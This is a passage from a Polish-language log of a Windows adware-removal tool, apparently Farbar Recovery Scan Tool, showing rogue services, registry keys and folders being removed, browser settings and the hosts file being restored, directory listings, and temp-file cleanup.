Explorer\Main\\Default_Page_URL => Wartość pomyślnie przywrócono HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Search_URL => Wartość pomyślnie przywrócono HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Search_URL => Wartość pomyślnie przywrócono HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\Software\Microsoft\Internet Explorer\Main\\Search Page => Wartość pomyślnie przywrócono HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\Software\Microsoft\Internet Explorer\Main\\Start Page => Wartość pomyślnie przywrócono HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\Software\Microsoft\Internet Explorer\Main\\Default_Page_URL => Wartość pomyślnie przywrócono HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\Software\Microsoft\Internet Explorer\Main\\Default_Search_URL => Wartość pomyślnie przywrócono HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Wartość pomyślnie przywrócono HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => klucz pomyślnie usunięto HKLM\Software\Classes\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => klucz nie znaleziono. HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Wartość pomyślnie przywrócono HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => klucz pomyślnie usunięto HKLM\Software\Wow6432Node\Classes\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => klucz nie znaleziono. HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Wartość pomyślnie usunięto HKU\S-1-5-21-1391594616-1957220202-1850595550-1000\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => klucz pomyślnie usunięto HKLM\Software\Classes\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => klucz nie znaleziono. BIT => Usługa pomyślnie zatrzymana. HKLM\System\CurrentControlSet\Services\BIT => klucz pomyślnie usunięto BIT => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\CSHMDR => klucz pomyślnie usunięto CSHMDR => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\CWASRE => klucz pomyślnie usunięto CWASRE => serwis pomyślnie usunięto FirefoxU => Usługa pomyślnie zatrzymana. HKLM\System\CurrentControlSet\Services\FirefoxU => klucz pomyślnie usunięto FirefoxU => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\NPASRE => klucz pomyślnie usunięto NPASRE => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\snare => klucz pomyślnie usunięto snare => serwis pomyślnie usunięto HKLM\System\CurrentControlSet\Services\terana => klucz pomyślnie usunięto terana => serwis pomyślnie usunięto WinAppSvr => Usługa pomyślnie zatrzymana. HKLM\System\CurrentControlSet\Services\WinAppSvr => klucz pomyślnie usunięto WinAppSvr => serwis pomyślnie usunięto WinSAPSvc => Usługa pomyślnie zatrzymana. HKLM\System\CurrentControlSet\Services\WinSAPSvc => klucz pomyślnie usunięto WinSAPSvc => serwis pomyślnie usunięto C:\ProgramData\BIT => pomyślnie przeniesiono C:\Users\And\AppData\Local\CSHMDR => pomyślnie przeniesiono C:\Users\And\AppData\Local\CWASRE => pomyślnie przeniesiono C:\Users\And\AppData\Local\NPASRE => pomyślnie przeniesiono C:\Users\And\AppData\Local\snare => pomyślnie przeniesiono C:\Users\And\AppData\Local\terana => pomyślnie przeniesiono C:\ProgramData\Microsoft\AppV\sym\dbg.dll => pomyślnie przeniesiono "C:\Users\And\AppData\Roaming\WinSAPSvc2017-05-24 11:08 - 2017-05-31 13:27 - 00001987 _____ C:\Users\And\Desktop\big_bang_empire.lnk" => nie znaleziono. C:\Users\And\AppData\Local\InstallationConfiguration.xml => pomyślnie przeniesiono C:\Users\And\AppData\Local\installer.dat => pomyślnie przeniesiono C:\Users\And\AppData\Local\Ranrantouch.bin => pomyślnie przeniesiono C:\Windows\Temp\gBAC6.tmp.exe => pomyślnie przeniesiono C:\Users\And\zijkxhq.exe => pomyślnie przeniesiono HKCU\Software\Hotleaf => klucz pomyślnie usunięto HKLM\SOFTWARE\WOW6432Node\Hotleaf => klucz pomyślnie usunięto HKCU\Software\Firefox => klucz pomyślnie usunięto HKLM\SOFTWARE\WOW6432Node\Firefox => klucz pomyślnie usunięto HKU\S-1-5-18\Software\Microsoft\Internet Explorer\Main => klucz nie znaleziono. HKU\S-1-5-19\Software\Microsoft\Internet Explorer\Main => klucz pomyślnie usunięto HKU\S-1-5-20\Software\Microsoft\Internet Explorer\Main => klucz pomyślnie usunięto HKU\S-1-5-18\Software\Microsoft\Internet Explorer\SearchScopes => klucz nie znaleziono. HKU\S-1-5-19\Software\Microsoft\Internet Explorer\SearchScopes => klucz nie znaleziono. HKU\S-1-5-20\Software\Microsoft\Internet Explorer\SearchScopes => klucz nie znaleziono. ========= dir /a "C:\Program Files" ========= Wolumin w stacji C nie ma etykiety. Numer seryjny woluminu: F412-129D Katalog: C:\Program Files 2017-05-22 12:38 . 2017-05-22 12:38 .. 2016-09-16 10:04 CanonBJ 2016-05-10 12:28 Common Files 2017-05-10 14:55 CXNQPK8EO0 2009-07-14 06:54 174 desktop.ini 2017-05-09 12:16 DeviceClient 2011-04-12 15:32 DVD Maker 2009-07-14 05:20 Exif Bestel for Windows 8 2015-11-23 19:33 GIMP 2 2017-05-10 14:55 GPP6LCIOPV 2016-03-17 12:58 Hewlett-Packard 2017-05-09 12:16 HJ32FO8OE1 2017-04-20 15:34 HP 2011-04-12 15:21 Internet Explorer 2016-09-29 15:06 Lexmark 1200 Series 2016-02-22 13:51 Logitech 2015-11-23 19:34 Microsoft Analysis Services 2017-05-09 12:16 Microsoft Office 2016-03-18 10:55 Microsoft SQL Server 2016-03-18 10:54 Microsoft Visual Studio 10.0 2015-11-23 19:36 Microsoft.NET 2009-07-14 07:32 MSBuild 2017-05-15 09:38 qm1gaf6p 2009-07-14 07:32 Reference Assemblies 2017-05-22 12:38 Sandboxie 2017-01-20 13:04 Tracker Software 2009-07-14 07:09 Uninstall Information 2011-04-12 15:21 Windows Defender 2011-04-12 15:32 Windows Journal 2011-04-12 15:21 Windows Mail 2011-04-12 15:21 Windows Media Player 2015-11-23 19:09 Windows NT 2011-04-12 15:21 Windows Photo Viewer 2010-11-21 05:31 Windows Portable Devices 2011-04-12 15:21 Windows Sidebar 1 plik(˘w) 174 bajt˘w 35 katalog(˘w) 238˙071˙488˙512 bajt˘w wolnych ========= Koniec CMD: ========= ========= dir /a "C:\Program Files (x86)" ========= Wolumin w stacji C nie ma etykiety. Numer seryjny woluminu: F412-129D Katalog: C:\Program Files (x86) 2017-06-19 14:53 . 2017-06-19 14:53 .. 2015-11-23 19:11 7-Zip 2017-02-06 13:03 ABBYY PDF Transformer 2.0 2016-02-05 14:43 Acro Software 2017-01-23 15:56 Armor CompaSearch 2016-11-14 16:50 CDBurnerXP 2017-04-20 15:33 Common Files 2016-01-11 16:27 DELL 2009-07-14 06:54 174 desktop.ini 2016-10-25 10:50 DeviceClient 2016-07-12 07:04 foobar2000 2015-12-11 15:54 Foxit Software 2015-11-23 19:45 Gadu-Gadu 10 2016-09-14 10:37 Gemalto 2016-01-07 11:39 GnuWin32 2015-11-24 23:50 Google 2016-02-05 14:43 GPLGS 2017-04-20 15:37 Hewlett-Packard 2017-05-17 10:49 Hotleaf 2017-04-20 15:35 HP 2016-09-07 11:02 HPDesignjet30-130PrinterSeries 2017-05-10 15:19 InstallShield Installation Information 2011-04-12 15:21 Internet Explorer 2016-10-21 10:55 Java 2016-09-29 15:05 Lexmark 1200 Series 2015-11-23 19:27 LibreOffice 5 2017-05-18 16:11 MCShield 2015-11-23 19:34 Microsoft Analysis Services 2015-11-23 19:33 Microsoft Office 2016-03-18 10:53 Microsoft SQL Server 2016-03-18 10:38 Microsoft.NET 2017-05-15 10:22 Mozilla Firefox 2017-06-05 09:30 Mozilla Maintenance Service 2017-06-05 09:30 Mozilla Thunderbird 2009-07-14 07:32 MSBuild 2015-11-23 19:42 Nowe Gadu-Gadu 2017-02-01 17:03 ntsn_serwis 2017-05-10 12:13 PC Clean Plus 2017-05-10 14:55 pccleanplus 2009-07-14 07:32 Reference Assemblies 2016-09-06 11:09 Samsung 2016-08-30 13:16 SoulseekQt 2009-07-14 06:57 Uninstall Information 2016-06-08 11:18 WicReset 2011-04-12 15:21 Windows Defender 2011-04-12 15:21 Windows Mail 2011-04-12 15:21 Windows Media Player 2009-07-14 07:32 Windows NT 2011-04-12 15:21 Windows Photo Viewer 2010-11-21 05:31 Windows Portable Devices 2011-04-12 15:21 Windows Sidebar 2016-10-03 10:24 XnView 1 plik(˘w) 174 bajt˘w 52 katalog(˘w) 238˙071˙484˙416 bajt˘w wolnych ========= Koniec CMD: ========= ========= dir /a "C:\Program Files\Common Files\System" ========= Wolumin w stacji C nie ma etykiety. Numer seryjny woluminu: F412-129D Katalog: C:\Program Files\Common Files\System 2015-11-23 19:34 . 2015-11-23 19:34 .. 2011-04-12 15:21 ado 2009-07-14 03:40 29˙184 DirectDB.dll 2011-04-12 15:21 en-US 2011-04-12 15:21 msadc 2015-11-23 19:34 MSMAPI 2015-11-23 19:36 Ole DB 2011-04-12 15:21 pl-PL 2009-07-14 03:41 886˙784 wab32.dll 2009-07-14 03:33 1˙098˙752 wab32res.dll 3 plik(˘w) 2˙014˙720 bajt˘w 8 katalog(˘w) 238˙071˙488˙512 bajt˘w wolnych ========= Koniec CMD: ========= ========= dir /a "C:\Program Files (x86)\Common Files\System" ========= Wolumin w stacji C nie ma etykiety. Numer seryjny woluminu: F412-129D Katalog: C:\Program Files (x86)\Common Files\System 2011-04-12 15:21 . 2011-04-12 15:21 .. 2011-04-12 15:21 ado 2009-07-14 03:15 24˙064 DirectDB.dll 2011-04-12 15:21 en-US 2011-04-12 15:21 msadc 2015-11-23 19:35 Ole DB 2011-04-12 15:21 pl-PL 2009-07-14 03:16 708˙608 wab32.dll 2009-07-14 03:11 1˙098˙752 wab32res.dll 3 plik(˘w) 1˙831˙424 bajt˘w 7 katalog(˘w) 238˙071˙484˙416 bajt˘w wolnych ========= Koniec CMD: ========= ========= dir /a C:\ProgramData ========= Wolumin w stacji C nie ma etykiety. Numer seryjny woluminu: F412-129D Katalog: C:\ProgramData 2017-06-19 15:02 . 2017-06-19 15:02 .. 2016-05-12 15:28 57 Ament.ini 2009-07-14 07:08 Application Data [C:\ProgramData] 2017-06-19 13:15 Armor CompaSearch 2016-11-14 16:50 Canneverbe Limited 2016-01-15 12:18 CanonBJ 2015-11-23 19:09 Dane aplikacji [C:\ProgramData] 2009-07-14 07:08 Desktop [C:\Users\Public\Desktop] 2009-07-14 07:08 Documents [C:\Users\Public\Documents] 2015-11-23 19:09 Dokumenty [C:\Users\Public\Documents] 2016-03-18 11:27 e-mo.pl 2016-07-18 14:30 EPSON 2017-05-10 15:26 F-Secure 2009-07-14 07:08 Favorites [C:\Users\Public\Favorites] 2017-05-15 13:28 firebird 2015-11-23 19:45 Gadu-Gadu 10 2016-01-07 09:54 GG 2017-04-24 09:08 Hewlett-Packard 2017-05-10 15:45 HitmanPro 2016-11-14 13:11 HP 2017-04-20 15:35 HPSSUPPLY 2016-02-22 13:53 Logishrd 2015-11-23 19:25 McAfee 2017-06-19 10:41 MCShield 2015-11-23 19:09 Menu Start [C:\ProgramData\Microsoft\Windows\Start Menu] 2017-06-12 11:22 Microsoft 2015-11-23 19:38 Microsoft Help 2016-10-21 10:56 Oracle 2017-05-09 12:17 PrefsSecure 2015-11-23 19:09 Pulpit [C:\Users\Public\Desktop] 2015-11-23 19:36 regid.1991-06.com.microsoft 2016-09-06 11:09 Samsung 2009-07-14 07:08 Start Menu [C:\ProgramData\Microsoft\Windows\Start Menu] 2015-11-23 19:09 Szablony [C:\ProgramData\Microsoft\Windows\Templates] 2009-07-14 07:08 Templates [C:\ProgramData\Microsoft\Windows\Templates] 2016-06-10 14:25 TP-LINK 2015-11-23 19:09 Ulubione [C:\Users\Public\Favorites] 1 plik(˘w) 57 bajt˘w 37 katalog(˘w) 238˙071˙480˙320 bajt˘w wolnych ========= Koniec CMD: ========= ========= dir /a C:\Users\And\AppData\Local ========= Wolumin w stacji C nie ma etykiety. Numer seryjny woluminu: F412-129D Katalog: C:\Users\And\AppData\Local 2017-06-19 15:02 . 2017-06-19 15:02 .. 2017-01-20 13:25 Adobe 2016-01-25 12:59 Apps 2017-05-10 08:29 CEF 2017-04-27 11:42 CutePDF Writer 2015-11-23 19:09 Dane aplikacji [C:\Users\And\AppData\Local] 2016-02-11 12:30 Dell 2016-01-25 12:59 Deployment 2016-11-07 11:35 Diagnostics 2016-03-18 11:26 e-mo.pl 2017-05-12 12:27 Eggper 2017-05-10 15:42 ElevatedDiagnostics 2017-02-06 11:08 ESET 2017-05-10 15:25 F-Secure 2017-05-12 12:27 Firefox 2015-11-30 10:46 fontconfig 2017-05-12 10:26 FSDART 2016-09-27 17:37 129˙912 GDIPFONTCACHEV1.DAT 2015-11-30 10:46 gegl-0.2 2017-05-19 12:19 GG 2015-12-03 00:57 GHISLER 2016-10-28 10:55 Google 2017-05-19 16:04 gtk-2.0 2015-11-23 19:09 Historia [C:\Users\And\AppData\Local\Microsoft\Windows\History] 2017-05-17 10:49 Hotleaf 2016-11-14 13:13 HP 2017-06-09 16:10 2˙601˙655 IconCache.db 2016-11-10 14:09 join.me 2015-11-23 19:27 Macromedia 2017-05-09 12:16 Mecalehorerle 2017-06-12 11:22 Microsoft 2016-08-17 12:22 Microsoft Help 2015-11-23 19:20 Mozilla 2015-12-07 16:05 OfficeBSCache-MyComputer 2015-11-23 19:32 Programs 2017-05-19 16:04 1˙625 recently-used.xbel 2017-05-16 14:08 7˙651 Resmon.ResmonCfg 2016-08-30 13:19 SoulseekQt 2017-06-19 11:41 Spotify 2017-06-19 15:02 Temp 2015-11-23 19:09 Temporary Internet Files [C:\Users\And\AppData\Local\Microsoft\Windows\Temporary Internet Files] 2015-11-30 10:46 Thunderbird 2016-11-10 13:08 VirtualStore 4 plik(˘w) 2˙740˙843 bajt˘w 40 katalog(˘w) 238˙071˙480˙320 bajt˘w wolnych ========= Koniec CMD: ========= ========= dir /a C:\Users\And\AppData\LocalLow ========= Wolumin w stacji C nie ma etykiety. Numer seryjny woluminu: F412-129D Katalog: C:\Users\And\AppData\LocalLow 2017-05-10 13:01 . 2017-05-10 13:01 .. 2015-11-23 19:27 Microsoft 2017-06-19 11:50 Mozilla 2016-03-23 16:51 Oracle 2016-03-23 16:52 Sun 2017-05-15 10:10 Temp 0 plik(˘w) 0 bajt˘w 7 katalog(˘w) 238˙071˙480˙320 bajt˘w wolnych ========= Koniec CMD: ========= ========= dir /a C:\Users\And\AppData\Roaming ========= Wolumin w stacji C nie ma etykiety. Numer seryjny woluminu: F412-129D Katalog: C:\Users\And\AppData\Roaming 2017-06-19 14:22 . 2017-06-19 14:22 .. 2017-05-10 14:55 356104 2017-05-10 14:55 586336 2015-11-23 19:27 Adobe 2017-05-10 12:47 AVAST Software 2016-11-14 16:50 Canneverbe Limited 2017-05-15 10:00 Event Monitor 2017-05-12 12:27 Firefox 2016-07-22 13:28 foobar2000 2015-12-11 15:54 Foxit 2015-11-24 01:49 Gadu-Gadu 10 2017-06-19 10:41 GG 2017-04-20 15:24 Google 2015-11-23 19:09 Identities 2015-11-23 19:49 LibreOffice 2016-02-22 13:50 Logishrd 2016-02-22 13:53 Logitech 2015-11-23 19:27 Macromedia 2011-04-12 15:32 Media Center Programs 2017-05-09 13:17 Microsoft 2015-11-23 19:14 Mozilla 2015-11-24 01:49 Nowe Gadu-Gadu 2017-05-09 12:16 Profiles 2016-09-06 11:09 Samsung 2017-06-19 11:00 Spotify 2016-03-23 16:52 Sun 2017-05-15 13:06 TeamViewer 2015-11-30 10:46 Thunderbird 2016-06-08 11:18 WicReset 2017-06-02 13:08 WinSAPSvc 2017-05-31 15:34 XnView 0 plik(˘w) 0 bajt˘w 32 katalog(˘w) 238˙071˙476˙224 bajt˘w wolnych ========= Koniec CMD: ========= ========= netsh advfirewall reset ========= Ok. ========= Koniec CMD: ========= C:\Windows\System32\Drivers\etc\hosts => pomyślnie przeniesiono Hosts pomyślnie przywrócono. =========== EmptyTemp: ========== BITS transfer queue => 8388608 B DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 6867032 B Java, Flash, Steam htmlcache => 1458 B Windows/system/drivers => 91190920 B Edge => 0 B Chrome => 0 B Firefox => 178034927 B Opera => 0 B Temp, IE cache, history, cookies, recent: Users => 0 B Default => 0 B Public => 0 B ProgramData => 0 B systemprofile => 28031302 B systemprofile32 => 49254372 B LocalService => 66228 B NetworkService => 19842 B And => 227069197 B MSSQL$SQLEXPRESS => 0 B RecycleBin => 82737832 B EmptyTemp: => 640.5 MB danych tymczasowych Usunięto. ================================ Rezultat przenoszenia plików przy restarcie (Tryb startu: Normal) (Data i godzina: 19-06-2017 15:08:29) C:\Program Files (x86)\Hotleaf => został pomyślnie przeniesiony C:\Users\And\AppData\Local\Hotleaf => został pomyślnie przeniesiony C:\Users\And\AppData\Roaming\Firefox => został pomyślnie przeniesiony C:\Users\And\AppData\Local\Firefox => został pomyślnie przeniesiony ==== Koniec Fixlog 15:08:29 ====